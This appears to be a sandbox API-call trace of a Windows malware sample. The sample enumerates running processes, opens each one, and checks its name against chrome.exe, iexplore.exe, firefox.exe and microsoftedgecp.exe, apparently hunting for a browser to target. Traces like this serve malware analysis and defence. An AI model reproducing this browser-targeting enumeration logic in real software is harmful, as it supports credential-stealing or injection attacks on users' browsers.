	[0202.824] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0202.825] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x23a0
	[0202.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.825] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.825] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.826] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.826] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.826] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0202.827] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x23a4
	[0202.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.827] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0202.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.827] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.827] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0202.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.828] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.828] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0202.829] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x23a8
	[0202.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.829] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0202.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.829] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.829] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0202.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.830] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.830] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0202.831] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x23ac
	[0202.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.831] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0202.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.831] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.831] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0202.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.832] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.832] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0202.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x23b0
	[0202.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.833] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0202.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.833] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.833] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0202.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.834] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.834] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.834] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x23b4
	[0202.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.835] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.835] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.835] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.835] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.836] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.836] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x23b8
	[0202.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.836] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.837] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.837] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.837] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.838] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x23bc
	[0202.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.838] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.839] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.839] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.839] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.839] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.840] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x23c0
	[0202.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.840] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.841] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.841] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.841] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.841] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.842] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x23c4
	[0202.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.842] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.843] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.843] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.843] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.843] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x23c8
	[0202.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.844] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.844] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.845] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.845] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.845] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.846] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x23cc
	[0202.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.846] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.846] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.847] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.847] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.847] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0202.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x23d0
	[0202.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.851] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0202.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.851] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.851] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0202.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.852] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.852] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x23d4
	[0202.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.853] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.853] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.853] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.854] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.854] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0202.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x23d8
	[0202.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.855] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.855] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.855] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.856] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.856] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0202.856] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x23dc
	[0202.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.857] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0202.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.857] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.857] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0202.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.857] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.858] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.858] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x23e0
	[0202.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.858] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.859] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.859] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.859] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.860] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0202.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x23e4
	[0202.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.860] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0202.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.861] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.861] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0202.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.861] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.862] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0202.862] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x23e8
	[0202.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.862] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0202.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.863] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.863] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0202.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.863] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.864] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0202.864] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x23ec
	[0202.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.864] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0202.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.865] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.865] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0202.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.865] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.865] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0202.866] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x23f0
	[0202.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.866] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0202.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.866] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.867] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0202.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.867] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.867] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0202.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0202.868] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0202.869] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x23f4
	[0202.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.869] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0202.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.869] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.870] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0202.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.870] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.871] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0202.871] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x23f8
	[0202.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.872] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0202.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.872] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.872] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0202.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.872] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.873] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0202.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x23fc
	[0202.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.873] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0202.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.874] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.874] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0202.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.874] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.875] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0202.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2400
	[0202.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.875] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
